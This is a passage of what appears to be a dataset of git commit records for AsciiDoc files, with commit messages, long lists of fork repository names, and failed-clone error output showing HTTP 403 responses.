title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/new_one.adoc","new_file":"content\/writings\/new_one.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"5b3e3f59e7c793c7ea462aa826edc815b2d2aa25","subject":"Add better instructions around using vagrant","message":"Add better instructions around using vagrant\n","repos":"chmouel\/origin,smarterclayton\/origin,rajkotecha\/origin,lixueclaire\/origin,childsb\/origin,greyfairer\/openshift-origin,mingderwang\/origin,zofuthan\/origin,inlandsee\/origin,jdnieto\/origin,rajkotecha\/origin,fkirill\/origin,jeremyeder\/origin,linearregression\/origin,linzhaoming\/origin,fabianofranz\/origin,danwinship\/origin,PI-Victor\/origin,kargakis\/origin,burmanm\/origin,liggitt\/origin,maxamillion\/origin,smunilla\/origin,markllama\/atomic-enterprise,juanvallejo\/origin,xuant\/origin,marun\/origin,levivic\/origin,mjisyang\/origin,Jandersolutions\/origin,jeffvance\/origin,enj\/origin,anpingli\/origin,Miciah\/origin,mingderwang\/origin,legionus\/origin,detiber\/origin,juanvallejo\/origin,juanvallejo\/origin,elyscape\/origin,wyue-redhat\/origin,mnagy\/origin,jdnieto\/origin,dinhxuanvu\/origin,pacoja84\/origin,sdodson\/origin,xuant\/origin,HyunsooKim1112\/origin,Nick-Harvey\/origin,sferich888\/origin,sseago\/origin,jdnieto\/origin,dobbymoodge\/origin,janetkuo\/origin,markllama\/atomic-enterprise,miminar\/atomic-enterprise,jeremyeder\/origin,smarterclayton\/origin,lixueclaire\/origin,hingstarne\/origin,asiainfoLDP\/datafactory,spinolacastro\/origin,abutcher\/origin,StevenLudwig\/origin,grdryn\/origin,romanbartl\/origin,jwforres\/origin,allevo\/origin,burmanm\/origin,ejemba\/origin,jeremyeder\/origin,ashcrow\/origin,dkorn\/origin,mdshuai\/origin,jwhonce\/origin,allevo\/origin,rafabene\/origin,seveillac\/origin,pmorie\/origin,php-coder\/origin,pkdevbox\/origin,smarterclayton\/origin,benjaminapetersen\/origin,luciddreamz\/origin,myfear\/origin,EricMountain-1A\/openshift-origin,jpeeler\/origin,php-coder\/origin,pombredanne\/atomic-enterprise,pgmcd\/origin,wanghaoran1988\/atomic-enterprise,tagoh\/origin,jupierce\/origin,samsong8610\/origin,rhcarvalho\/origin,marsmensch\/atomic-enterprise,janetkuo\/origin,romanbartl\/origin,fabianofranz\/origin,cgwalters\/origin,cgwalters\/origin,quantiply-fork\/origin,pombredanne\/atomic-enterprise,dkorn\/origin,jprukner\/origin,mnagy\/origin,Jandersoft\/origin,tnguyen-rh\/origin,ryanj\/origin,rhcarvalho\/origin,rhuss\/origin,wyue-redhat\/origin,ryanj\/origin,ibotty\/origin,tjcunliffe\/origin,pgmcd\/origin,lixueclaire\/origin,lixueclaire\/origin,benjaminapetersen\/origin,ocsbrandon\/origin,childsb\/origin,barrett-vegas-com\/origin,maleck13\/origin,xuant\/origin,jwhonce\/origin,yarko\/origin,mnagy\/origin,burmanm\/origin,csrwng\/origin,jdnieto\/origin,ibotty\/origin,abutcher\/origin,rootfs\/origin,craigmunro\/origin,levivic\/origin,marun\/origin,simo5\/origin,jwhonce\/origin,jhadvig\/origin,goern\/origin,gesrat-cisco\/origin,jeremyeder\/origin,Miciah\/origin,mingderwang\/origin,danmcp\/origin,marsmensch\/atomic-enterprise,ocsbrandon\/origin,detiber\/origin,tjanez\/origin,HyunsooKim1112\/origin,gabemontero\/origin,dcrisan\/origin,miminar\/origin,biyiklioglu\/origin,rafabene\/origin,myfear\/origin,mrogers950\/origin,fkirill\/origin,Jandersolutions\/origin,tdawson\/origin,romanbartl\/origin,mahak\/origin,StevenLudwig\/origin,mrogers950\/origin,StevenLudwig\/origin,dustintownsend\/origin,stackdocker\/origin,rootfs\/origin,enj\/origin,benjaminapetersen\/origin,rajatchopra\/origin,spinolacastro\/origin,hingstarne\/origin,liggitt\/origin,sferich888\/origin,jsafrane\/origin,wanghaoran1988\/atomic-enterprise,mahak\/origin,gesrat-cisco\/origin,ejemba\/origin,tnguyen-rh\/origin,dkorn\/origin,thesteve0\/origin,jim-minter\/origin,thrasher-redhat\/origin,luciddreamz\/origin,raffaelespazzoli\/origin,marsmensch\/atomic-enterprise,tnguyen-rh\/origin,php-coder\/origin,willmtemple\/origin,robertol\/origin,dmage\/origin,maxamillion\/origin,samsong8610\/origin,ncdc\/origin,vongalpha\/origin,mfisher-rht\/origin,quantiply-fork\/origin,gashcrumb\/origin,spinolacastro\/origin,danmcp\/origin,lorenzogm\/openshift-origin,maleck13\/origin,ibotty\/origin,markllama\/origin,rchicoli\/openshift-origin,rusenask\/origin,Tlacenka\/origin,Nick-Harvey\/origin,rusenask\/origin,mfisher-rht\/origin,oybed\/origin,PI-Victor\/origin,knobunc\/origin,levivic\/origin,biyiklioglu\/origin,levivic\/origin,vongalpha\/origin,luciddreamz\/origin,fabianofranz\/origin,xiuwang\/origin,greyfairer\/openshift-origin,dgoodwin\/origin,joshuawilson\/origin,anpingli\/origin,westmisfit\/origin,jprukner\/origin,jprukner\/origin,Tlacenka\/origin,benjaminapetersen\/origin,sdodson\/origin,spadgett\/origin,ravisantoshgudimetla\/origin,lorenzogm\/openshift-origin,dkorn\/origin,miminar\/origin,zhaosijun\/origin,sg00dwin\/origin,HyunsooKim1112\/origin,allevo\/origin,spadgett\/origin,jupierce\/origin,rrati\/origin,gruiz17\/origin,chmouel\/origin,wanghaoran1988\/origin,maleck13\/origin,tdawson\/origin,asiainfoLDP\/datafactory,romanbartl\/origin,miminar\/origin,pmorie\/origin,wanghaoran1988\/atomic-enterprise,dcbw\/origin,benjaminapetersen\/origin,spohnan\/origin,rhamilto\/origin,tagoh\/origin,nhr\/origin,burmanm\/origin,westmisfit\/origin,ashcrow\/origin,bowenha2\/origin,ingvagabund\/origin,jdnieto\/origin,jpeeler\/origin,EricMountain-1A\/openshift-origin,rhuss\/origin,anpingli\/origin,ryanj\/origin,imcsk8\/origin,aweiteka\/origin,willmtemple\/origin,mdshuai\/origin,jupierce\/origin,xiuwang\/origin,pkdevbox\/origin,liangxia\/origin,nitintutlani\/origin,gruiz17\/origin,moolitayer\/origin,tnguyen-rh\/origin,mdshuai\/origin,rafabene\/origin,adelton\/origin,tjanez\/origin,thesteve0\/origin,mrogers950\/origin,adelton\/origin,craigmunro\/origin,gruiz17\/origin,oybed\/origin,rafabene\/origin,rhuss\/origin,spohnan\/origin,tnozicka\/origin,pacoja84\/origin,tnguyen-rh\/origin,thrasher-redhat\/origin,oybed\/origin,tjanez\/origin,raffaelespazzoli\/origin,soltysh\/origin,rafabene\/origin,markllama\/origin,craigmunro\/origin,louyihua\/origin,kargakis\/origin,akram\/origin,samsong8610\/origin,senayar\/origin,thesteve0\/origin,mjisyang\/origin,biyiklioglu\/origin,tracyrankin\/origin,ramr\/origin,mjisyang\/origin,tagoh\/origin,zhaosijun\/origin,jpeeler\/origin,thesteve0\/origin,YannMoisan\/origin,Jandersolutions\/origin,pravisankar\/origin,YannMoisan\/origin,coreydaley\/origin,jpeeler\/origin,liangxia\/origin,fkirill\/origin,wjiangjay\/origin,y0no\/origin,elyscape\/origin,Tlacenka\/origin,mfisher-rht\/origin,jsafrane\/origin,mrogers950\/origin,swizzley\/origin,imcsk8\/origin,allevo\/origin,jsafrane\/origin,domenicbove\/origin,jdnieto\/origin,samsong8610\/origin,simo5\/origin,sg00dwin\/origin,linearregression\/origin,pombredanne\/atomic-enterprise,westmisfit\/origin,sallyom\/origin,matthyx\/origin,moolitayer\/origin,marsmensch\/atomic-enterprise,wanghaoran1988\/atomic-enterprise,moolitayer\/origin,ncdc\/origin,y0no\/origin,craigmunro\/origin,StevenLudwig\/origin,simo5\/origin,goern\/origin,bparees\/origin,Jandersoft\/origin,pkdevbox\/origin,nhr\/origin,xuant\/origin,ashcrow\/origin,Tlacenka\/origin,Tlacenka\/origin,westmisfit\/origin,jim-minter\/origin,liggitt\/origin,eparis\/origin,rusenask\/origin,legionus\/origin,jhadvig\/origin,pmorie\/origin,oybed\/origin,jwhonce\/origin,y0no\/origin,mfojtik\/origin,joshuawilson\/origin,smarterclayton\/origin,danmcp\/origin,abutcher\/origin,dgoodwin\/origin,rajkotecha\/origin,stackdocker\/origin,sgallagher\/origin,yepengxj\/df,rhuss\/origin,liggitt\/origin,dustintownsend\/origin,sgallagher\/origin,pgmcd\/origin,projectatomic\/atomic-enterprise,dinhxuanvu\/origin,php-coder\/origin,ncdc\/origin,tagoh\/origin,rajatchopra\/origin,janetkuo\/origin,YannMoisan\/origin,stefwalter\/origin,Nick-Harvey\/origin,smunilla\/origin,dkorn\/origin,dgoodwin\/origin,danwinship\/origin,dustintownsend\/origin,deads2k\/origin,markllama\/origin,stefwalter\/origin,barrett-vegas-com\/origin,coreydaley\/origin,projectatomic\/atomic-enterprise,adietish\/origin,barrett-vegas-com\/origin,sjug\/origin,childsb\/origin,westmisfit\/origin,soltysh\/origin,joshuawilson\/origin,eparis\/origin,pecameron\/origin,y0no\/origin,adietish\/origin,nak3\/origin,linearregression\/origin,Jandersolutions\/origin,pravisankar\/origin,arilivigni\/origin,gesrat-cisco\/origin,EricMountain-1A\/openshift-origin,pravisankar\/origin,imcsk8\/origin,danwinship\/origin,nhr\/origin,allevo\/origin,rhcarvalho\/origin,jhammant\/origin,aveshagarwal\/origin,kargakis\/origin,dobbymoodge\/origin,hferentschik\/origin,biyiklioglu\/origin,jhadvig\/origin,tiwillia\/origin,hingstarne\/origin,sdminonne\/origin,ingvagabund\/origin,bowenha2\/origin,nitintutlani\/origin,spinolacastro\/origin,wyue-redhat\/origin,wanghaoran1988\/atomic-enterprise,wanghaoran1988\/atomic-enterprise,danmcp\/origin,tracyrankin\/origin,jhammant\/origin,Jandersoft\/origin,dinhxuanvu\/origin,miminar\/atomic-enterprise,luciddreamz\/origin,gabemontero\/origin,mingderwang\/origin,zhaosijun\/origin,ibotty\/origin,mdshuai\/origin,markllama\/atomic-enterprise,liangxia\/origin,aweiteka\/origin,grdryn\/origin,childsb\/origin,swizzley\/origin,tiwillia\/origin,jim-minter\/origin,adelton\/origin,legionus\/origin,wanghaoran1988\/origin,tjanez\/origin,y0no\/origin,wanghaoran1988\/origin,elyscape\/origin,lorenzogm\/openshift-origin,vongalpha\/origin,matthyx\/origin,openshift\/origin,Jandersolutions\/origin,aweiteka\/origin,PI-Victor\/origin,rchicoli\/openshift-origin,jhadvig\/origin,EricMountain-1A\/openshift-origin,gruiz17\/origin,danwinship\/origin,pmorie\/origin,rhamilto\/origin,yepengxj\/df,detiber\/origin,vongalpha\/origin,mfojtik\/origin,sallyom\/origin,smunilla\/origin,christian-posta\/origin,ejemba\/origin,grdryn\/origin,PI-Victor\/origin,jupierce\/origin,danwinship\/origin,rrati\/origin,wyue-redhat\/origin,juanvallejo\/origin,greyfairer\/openshift-origin,mrogers950\/origin,jhadvig\/origin,smunilla\/origin,jhammant\/origin,asiainfoLDP\/datafactory,dustintownsend\/origin,juanvallejo\/origin,christian-posta\/origin,spinolacastro\/origin,linux-on-ibm-z\/origin,liangxia\/origin,rajkotecha\/origin,dgoodwin\/origin,linzhaoming\/origin,gesrat-cisco\/origin,dcrisan\/origin,dcbw\/origin,ncdc\/origin,tdawson\/origin,pkdevbox\/origin,ironcladlou\/origin,sg00dwin\/origin,xuant\/origin,gruiz17\/origin,christian-posta\/origin,burmanm\/origin,smunilla\/origin,nak3\/origin,vongalpha\/origin,ryanj\/origin,liggitt\/origin,senayar\/origin,linux-on-ibm-z\/origin,pacoja84\/origin,dobbymoodge\/origin,mkumatag\/origin,benjaminapetersen\/origin,grdryn\/origin,ryanj\/origin,PI-Victor\/origin,asiainfoLDP\/datafactory,imcsk8\/origin,tjanez\/origin,greyfairer\/openshift-origin,jwforres\/origin,marsmensch\/atomic-enterprise,sseago\/origin,HyunsooKim1112\/origin,goern\/origin,kargakis\/origin,wanghaoran1988\/origin,projectatomic\/atomic-enterprise,mdshuai\/origin,EricMountain-1A\/openshift-origin,matthyx\/origin,yarko\/origin,yarko\/origin,markllama\/atomic-enterprise,pmorie\/origin,fabianofranz\/origin,hferentschik\/origin,mkumatag\/origin,ravisantoshgudimetla\/origin,romanbartl\/origin,jprukner\/origin,hferentschik\/origin,domenicbove\/origin,chmouel\/origin,samsong8610\/origin,php-coder\/origin,domenicbove\/origin,stevekuznetsov\/origin,rhuss\/origin,robertol\/origin,markllama\/origin,ejemba\/origin,seveillac\/origin,deads2k\/origin,rusenask\/origin,thesteve0\/origin,dustintownsend\/origin,HyunsooKim1112\/origin,spohnan\/origin,goern\/origin,pkdevbox\/origin,rajkotecha\/origin,westmisfit\/origin,barrett-vegas-com\/origin,lorenzogm\/openshift-origin,deads2k\/origin,jprukner\/origin,dmage\/origin,zofuthan\/origin,ocsbrandon\/origin,stefwalter\/origin,wjiangjay\/origin,YannMoisan\/origin,Jandersolutions\/origin,inlandsee\/origin,senayar\/origin,YannMoisan\/origin,pacoja84\/origin,rchicoli\/openshift-origin,stefwalter\/origin,jupierce\/origin,nitintutlani\/origin,louyihua\/origin,coreydaley\/origin,ironcladlou\/origin,seveillac\/origin,tracyrankin\/origin,pgmcd\/origin,jhadvig\/origin,levivic\/origin,Jandersoft\/origin,pecameron\/origin,rhamilto\/origin,jwforres\/origin,myfear\/origin,dgoodwin\/origin,bowenha2\/origin,tagoh\/origin,christian-posta\/origin,chmouel\/origin,raffaelespazzoli\/origin,rrati\/origin,Miciah\/origin,ravisantoshgudimetla\/origin,miminar\/atomic-enterprise,ejemba\/origin,jwhonce\/origin,yarko\/origin,imcsk8\/origin,HyunsooKim1112\/origin,joshuawilson\/origin,xiuwang\/origin,arilivigni\/origin,gashcrumb\/origin,gruiz17\/origin,tjcunliffe\/origin,janetkuo\/origin,jprukner\/origin,jwforres\/origin,maxamillion\/origin,zofuthan\/origin,rusenask\/origin,knobunc\/origin,xuant\/origin,ocsbrandon\/origin,swizzley\/origin,adelton\/origin,legionus\/origin,domenicbove\/origin,aweiteka\/origin,projectatomic\/atomic-enterprise,hroyrh\/origin,sseago\/origin,nhr\/origin,simo5\/origin,kargakis\/origin,thrasher-redhat\/origin,bparees\/origin,jwhonce\/origin,csrwng\/origin,imcsk8\/origin,pacoja84\/origin,thrasher-redhat\/origin,mrogers950\/origin,openshift\/origin,arilivigni\/origin,thesteve0\/origin,dcbw\/origin,samsong8610\/origin,cgwalters\/origin,adietish\/origin,burmanm\/origin,jwforres\/origin,lorenzogm\/openshift-origin,adietish\/origin,legionus\/origin,pweil-\/origin,dinhxuanvu\/origin,wjiangjay\/origin,spinolacastro\/origin,dcrisan\/origin,craigmunro\/origin,aveshagarwal\/origin,domenicbove\/origin,senayar\/origin,dobbymoodge\/origin,sdodson\/origin,markllama\/origin,tnozicka\/origin,rootfs\/origin,sspeiche\/origin,Tlacenka\/origin,pravisankar\/origin,hroyrh\/origin,zofuthan\/origin,sjug\/origin,openshift\/origin,chlunde\/origin,soltysh\/origin,dcbw\/origin,ramr\/origin,domenicbove\/origin,dkorn\/origin,rajatchopra\/origin,fkirill\/origin,swizzley\/origin,stefwalter\/origin,cgwalters\/origin,barrett-vegas-com\/origin,PI-Victor\/origin,ocsbrandon\/origin,rrati\/origin,eparis\/origin,luciddreamz\/origin,elyscape\/origin,greyfairer\/openshift-origin,senayar\/origin,sseago\/origin,tjcunliffe\/origin,rhcarvalho\/origin,zhaosijun\/origin,liangxia\/origin,pacoja84\/origin,cgwalters\/origin,senayar\/origin,gabemontero\/origin,mdshuai\/origin,bowenha2\/origin,dustintownsend\/origin,tjcunliffe\/origin,spadgett\/origin,seveillac\/origin,mnagy\/origin,marun\/origin,bowenha2\/origin,yarko\/origin,adelton\/origin,ramr\/origin,childsb\/origin,robertol\/origin,tiwillia\/origin,nak3\/origin,ashcrow\/origin,tagoh\/origin,mkumatag\/origin,mnagy\/origin,projectatomic\/atomic-enterprise,pravisankar\/origin,hingstarne\/origin,dobbymoodge\/origin,dmage\/origin,dmage\/origin,miminar\/atomic-enterprise,grdryn\/origin,JacobTanenbaum\/origin,dcbw\/origin,bowenha2\/origin,yepengxj\/df,gashcrumb\/origin,mfojtik\/origin,wyue-redhat\/origin,kargakis\/origin,akram\/origin,barrett-vegas-com\/origin,pweil-\/origin,christian-posta\/origin,hferentschik\/origin,maxamillion\/origin,linux-on-ibm-z\/origin,louyihua\/origin,ashcrow\/origin,joshuawilson\/origin,pombredanne\/atomic-enterprise,php-coder\/origin,akram\/origin,knobunc\/origin,stevekuznetsov\/origin,jeremyeder\/origin,csrwng\/origin,markllama\/atomic-enterprise,sgallagher\/origin,mjisyang\/origin,inlandsee\/origin,nitintutlani\/origin,myfear\/origin,grdryn\/origin,childsb\/origin,ramr\/origin,spohnan\/origin,mingderwang\/origin,Nick-Harvey\/origin,matthyx\/origin,tjanez\/origin,sjug\/origin,smarterclayton\/origin,pgmcd\/origin,craigmunro\/origin,rhamilto\/origin,mfisher-rht\/origin,rootfs\/origin,yepengxj\/df,pgmcd\/origin,spohnan\/origin,wjiangjay\/origin,sgallagher\/origin,dcrisan\/origin,knobunc\/origin,chlunde\/origin,enj\/origin,luciddreamz\/origin,wjiangjay\/origin,rootfs\/origin,ryanj\/origin,StevenLudwig\/origin,fkirill\/origin,stackdocker\/origin,pecameron\/origin,jhammant\/origin,zofuthan\/origin,quantiply-fork\/origin,stackdocker\/origin,tnozicka\/origin,hroyrh\/origin,oybed\/origin,ocsbrandon\/origin,pombredanne\/atomic-enterprise,marsmensch\/atomic-enterprise,danwinship\/origin,rajatchopra\/origin,sg00dwin\/origin,eparis\/origin,myfear\/origin,stevekuznetsov\/origin,aveshagarwal\/origin,robertol\/origin,cgwalters\/origin,abutcher\/origin,seveillac\/origin,ironcladlou\/origin,aveshagarwal\/origin,elyscape\/origin,rajatchopra\/origin,nitintutlani\/origin,ashcrow\/origin,juanvallejo\/origin,oybed\/origin,chlunde\/origin,tnozicka\/origin,matthyx\/origin,inlandsee\/origin,sferich888\/origin,tnozicka\/origin,lixueclaire\/origin,rchicoli\/openshift-origin,JacobTanenbaum\/origin,tnguyen-rh\/origin,allevo\/origin,projectatomic\/atomic-enterprise,willmtemple\/origin,seveillac\/origin,abutcher\/origin,ibotty\/origin,quantiply-fork\/origin,stevekuznetsov\/origin,wyue-redhat\/origin,moolitayer\/origin,linzhaoming\/origin,zofuthan\/origin,ravisantoshgudimetla\/origin,ravisantoshgudimetla\/origin,liggitt\/origin,linearregression\/origin,jhammant\/origin,jeffvance\/origin,rafabene\/origin,lixueclaire\/origin,mfisher-rht\/origin,sseago\/origin,asiainfoLDP\/datafactory,asiainfoLDP\/datafactory,quantiply-fork\/origin,christian-posta\/origin,romanbartl\/origin,hferentschik\/origin,pombredanne\/atomic-enterprise,y0no\/origin,tjcunliffe\/origin,jhammant\/origin,adietish\/origin,janetkuo\/origin,mingderwang\/origin,YannMoisan\/origin,quantiply-fork\/origin,greyfairer\/openshift-origin,sdminonne\/origin,markllama\/atomic-enterprise,hferentschik\/origin,louyihua\/origin,yarko\/origin,levivic\/origin,sdodson\/origin,vongalpha\/origin,ibotty\/origin,markllama\/origin,bparees\/origin,chlunde\/origin,miminar\/atomic-enterprise,dinhxuanvu\/origin,EricMountain-1A\/openshift-origin,linzhaoming\/origin,simo5\/origin,sallyom\/origin,joshuawilson\/origin,tracyrankin\/origin,biyiklioglu\/origin,miminar\/origin,maleck13\/origin,swizzley\/origin,rrati\/origin,tiwillia\/origin,sspeiche\/origin,jeffvance\/origin,moolitayer\/origin,tdawson\/origin,rhcarvalho\/origin,swizzley\/origin,rajatchopra\/origin,StevenLudwig\/origin,spadgett\/origin,tjcunliffe\/origin,fkirill\/origin,adietish\/origin,sdminonne\/origin,rhuss\/origin,spadgett\/origin,ramr\/origin,ejemba\/origin,spohnan\/origin,linux-on-ibm-z\/origin,willmtemple\/origin,hingstarne\/origin,sdodson\/origin,linzhaoming\/origin,smunilla\/origin,mfisher-rht\/origin,mahak\/origin,dcrisan\/origin,Jandersoft\/origin,dcrisan\/origin,jeffvance\/origin,gesrat-cisco\/origin,ingvagabund\/origin,wanghaoran1988\/origin,Nick-Harvey\/origin,biyiklioglu\/origin,Nick-Harvey\/origin,pweil-\/origin,sseago\/origin,nitintutlani\/origin,aweiteka\/origin,maxamillion\/origin,wjiangjay\/origin,linux-on-ibm-z\/origin,rajkotecha\/origin,tnozicka\/origin,miminar\/origin,detiber\/origin,liangxia\/origin,louyihua\/origin,arilivigni\/origin,marun\/origin,lorenzogm\/openshift-origin,sspeiche\/origin,hingstarne\/origin,sspeiche\/origin,mjisyang\/origin,aveshagarwal\/origin,stackdocker\/origin,myfear\/origin,stackdocker\/origin,miminar\/origin,mnagy\/origin,robertol\/origin,jpeeler\/origin,jwforres\/origin,raffaelespazzoli\/origin,robertol\/origin,stefwalter\/origin,gashcrumb\/origin,pkdevbox\/origin,sdodson\/origin,Jandersoft\/origin,mjisyang\/origin,nhr\/origin,JacobTanenbaum\/origin,gesrat-cisco\/origin,janetkuo\/origin,dobbymoodge\/origin,miminar\/atomic-enterprise,detiber\/origin,linux-on-ibm-z\/origin,rhamilto\/origin,aweiteka\/origin,moolitayer\/origin,rusenask\/origin","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/asiainfoLDP\/datafactory.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8eeea59b1e31e7e3e3c9dcf150439a8e0323f5fc","subject":"Update 2015-02-28-Tech-Net-Wiki-Power-B-I-Api-en-Net.adoc","message":"Update 2015-02-28-Tech-Net-Wiki-Power-B-I-Api-en-Net.adoc","repos":"Vtek\/vtek.github.io,Vtek\/vtek.github.io,Vtek\/vtek.github.io,Vtek\/vtek.github.io","old_file":"_posts\/2015-02-28-Tech-Net-Wiki-Power-B-I-Api-en-Net.adoc","new_file":"_posts\/2015-02-28-Tech-Net-Wiki-Power-B-I-Api-en-Net.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vtek\/vtek.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2f6527f491da8b19f7c6c4644f24387bba2e6447","subject":"[DOCS] Update documentation for `max_token_length`","message":"[DOCS] Update documentation for `max_token_length`\n\nIn 1.4 the behavior is different due to\nhttps:\/\/issues.apache.org\/jira\/browse\/LUCENE-5897\n","repos":"sauravmondallive\/elasticsearch,Siddartha07\/elasticsearch,onegambler\/elasticsearch,anti-social\/elasticsearch,alexshadow007\/elasticsearch,nrkkalyan\/elasticsearch,pablocastro\/elasticsearch,adrianbk\/elasticsearch,rajanm\/elasticsearch,JSCooke\/elasticsearch,iantruslove\/elasticsearch,yongminxia\/elasticsearch,TonyChai24\/ESSource,jimhooker2002\/elasticsearch,xingguang2013\/elasticsearch,kaneshin\/elasticsearch,fooljohnny\/elasticsearch,snikch\/elasticsearch,jchampion\/elasticsearch,bestwpw\/elasticsearch,sc0ttkclark\/elasticsearch,vingupta3\/elasticsearch,socialrank\/elasticsearch,mortonsykes\/elasticsearch,fred84\/elasticsearch,slavau\/elasticsearch,mgalushka\/elasticsearch,MichaelLiZhou\/elasticsearch,jeteve\/elasticsearch,jimczi\/elasticsearch,franklanganke\/elasticsearch,masterweb121\/elasticsearch,njlawton\/elasticsearch,wangtuo\/elasticsearch,YosuaMichael\/elasticsearch,pozhidaevak\/elasticsearch,mmaracic\/elasticsearch,18098924759\/elasticsearch,dylan8902\/elasticsearch,wbowling\/elasticsearch,slavau\/elasticsearch,kalburgimanjunath\/elasticsearch,sjohnr\/elasticsearch,dongjoon-hyun\/elasticsearch,mjhennig\/elasticsearch,golubev\/elasticsearch,jango2015\/elasticsearch,queirozfcom\/elasticsearch,liweinan0423\/elasticsearch,avikurapati\/elasticsearch,luiseduardohdbackup\/elasticsearch,xuzha\/elasticsearch,golubev\/elasticsearch,tebriel\/elasticsearch,mgalushka\/elasticsearch,fekaputra\/elasticsearch,KimTaehee\/elasticsearch,pablocastro\/elasticsearch,areek\/elasticsearch,alexbrasetvik\/elasticsearch,phani546\/elasticsearch,rento19962\/elasticsearch,rento19962\/elasticsearch,thecocce\/elasticsearch,kkirsche\/elasticsearch,thecocce\/elasticsearch,masaruh\/elasticsearch,lchennup\/elasticsearch,infusionsoft\/elasticsearch,apepper\/elasticsearch,adrianbk\/elasticsearch,beiske\/elasticsearch,zkidkid\/elasticsearch,Stacey-Gammon\/elasticsearch,Clairebi\/ElasticsearchClone,sauravmondallive\/elasticsearch,liweinan0423\/elasticsearch,queirozfcom\/elasticsearch,lchennup\/elasticsearch,codebunt\/elasticsearch,diendt\/elasticsearch,PhaedrusTheGreek\/elasticsearch,truemped\/elasticsearch,martinstuga\/elasticsearch,likaiwalkman\/elasticsearch,lzo\/elasticsearch-1,xpandan\/elasticsearch,weipinghe\/elasticsearch,IanvsPoplicola\/elasticsearch,zhiqinghuang\/elasticsearch,ulkas\/elasticsearch,sjohnr\/elasticsearch,MichaelLiZhou\/elasticsearch,iantruslove\/elasticsearch,AshishThakur\/elasticsearch,HarishAtGitHub\/elasticsearch,smflorentino\/elasticsearch,zkidkid\/elasticsearch,masaruh\/elasticsearch,areek\/elasticsearch,iantruslove\/elasticsearch,caengcjd\/elasticsearch,mute\/elasticsearch,MichaelLiZhou\/elasticsearch,HarishAtGitHub\/elasticsearch,Chhunlong\/elasticsearch,hechunwen\/elasticsearch,pranavraman\/elasticsearch,jbertouch\/elasticsearch,henakamaMSFT\/elasticsearch,springning\/elasticsearch,amit-shar\/elasticsearch,areek\/elasticsearch,ckclark\/elasticsearch,javachengwc\/elasticsearch,EasonYi\/elasticsearch,yongminxia\/elasticsearch,btiernay\/elasticsearch,luiseduardohdbackup\/elasticsearch,mikemccand\/elasticsearch,dataduke\/elasticsearch,lydonchandra\/elasticsearch,spiegela\/elasticsearch,wuranbo\/elasticsearch,nknize\/elasticsearch,kunallimaye\/elasticsearch,kingaj\/elasticsearch,Shepard1212\/elasticsearch,Ansh90\/elasticsearch,luiseduardohdbackup\/elasticsearch,GlenRSmith\/elasticsearch,achow\/elasticsearch,snikch\/elasticsearch,lmtwga\/elasticsearch,tkssharma\/elasticsearch,ydsakyclguozi\/elasticsearch,alexkuk\/elasticsearch,wittyameta\/elasticsearch,scorpionvicky\/elasticsearch,sarwarbhuiyan\/elasticsearch,masterweb121\/elasticsearch,gmarz\/elasticsearch,HarishAtGitHub\/elasticsearch,zeroctu\/elasticsearch,aglne\/elasticsearch,smflorentino\/elasticsearch,wayeast\/elasticsearch,Fsero\/elasticsearch,YosuaMichael\/elasticsearch,wbowling\/elasticsearch,NBSW\/elasticsearch,yanjunh\/elasticsearch,likaiwalkman\/elasticsearch,strapdata\/elassandra,mcku\/elasticsearch,myelin\/elasticsearch,diendt\/elasticsearch,adrianbk\/elasticsearch,davidvgalbraith\/elasticsearch,vingupta3\/elasticsearch,iamjakob\/elasticsearch,ESamir\/elasticsearch,beiske\/elasticsearch,markharwood\/elasticsearch,a2lin\/elasticsearch,franklanganke\/elasticsearch,mgalushka\/elasticsearch,alexkuk\/elasticsearch,ThalaivaStars\/OrgRepo1,apepper\/elasticsearch,obourgain\/elasticsearch,phani546\/elasticsearch,markwalkom\/elasticsearch,mapr\/elasticsearch,ydsakyclguozi\/elasticsearch,mrorii\/elasticsearch,infusionsoft\/elasticsearch,schonfeld\/elasticsearch,feiqitian\/elasticsearch,yuy168\/elasticsearch,vrkansagara\/elasticsearch,IanvsPoplicola\/elasticsearch,NBSW\/elasticsearch,jbertouch\/elasticsearch,hanswang\/elasticsearch,huypx1292\/elasticsearch,Asimov4\/elasticsearch,KimTaehee\/elasticsearch,MjAbuz\/elasticsearch,jsgao0\/elasticsearch,ThalaivaStars\/OrgRepo1,girirajsharma\/elasticsearch,hirdesh2008\/elasticsearch,luiseduardohdbackup\/elasticsearch,bawse\/elasticsearch,Fsero\/elasticsearch,kalimatas\/elasticsearch,areek\/elasticsearch,elasticdog\/elasticsearch,strapdata\/elassandra-test,kalburgimanjunath\/elasticsearch,Uiho\/elasticsearch,Fsero\/elasticsearch,nellicus\/elasticsearch,ricardocerq\/elasticsearch,Clairebi\/ElasticsearchClone,ZTE-PaaS\/elasticsearch,polyfractal\/elasticsearch,rhoml\/elasticsearch,markharwood\/elasticsearch,zeroctu\/elasticsearch,LeoYao\/elasticsearch,iacdingping\/elasticsearch,martinstuga\/elasticsearch,petabytedata\/elasticsearch,djschny\/elasticsearch,dongjoon-hyun\/elasticsearch,alexbrasetvik\/elasticsearch,MisterAndersen\/elasticsearch,dylan8902\/elasticsearch,jbertouch\/elasticsearch,loconsolutions\/elasticsearch,AshishThakur\/elasticsearch,djschny\/elasticsearch,huanzhong\/elasticsearch,knight1128\/elasticsearch,beiske\/elasticsearch,umeshdangat\/elasticsearch,njlawton\/elasticsearch,luiseduardohdbackup\/elasticsearch,clintongormley\/elasticsearch,LeoYao\/elasticsearch,lydonchandra\/elasticsearch,JackyMai\/elasticsearch,mm0\/elasticsearch,vroyer\/elassandra,ThiagoGarciaAlves\/elasticsearch,Uiho\/elasticsearch,sneivandt\/elasticsearch,ESamir\/elasticsearch,Helen-Zhao\/elasticsearch,gingerwizard\/elasticsearch,codebunt\/elasticsearch,dongjoon-hyun\/elasticsearch,djschny\/elasticsearch,MichaelLiZhou\/elasticsearch,pritishppai\/elasticsearch,Shekharrajak\/elasticsearch,iacdingping\/elasticsearch,hirdesh2008\/elasticsearch,lks21c\/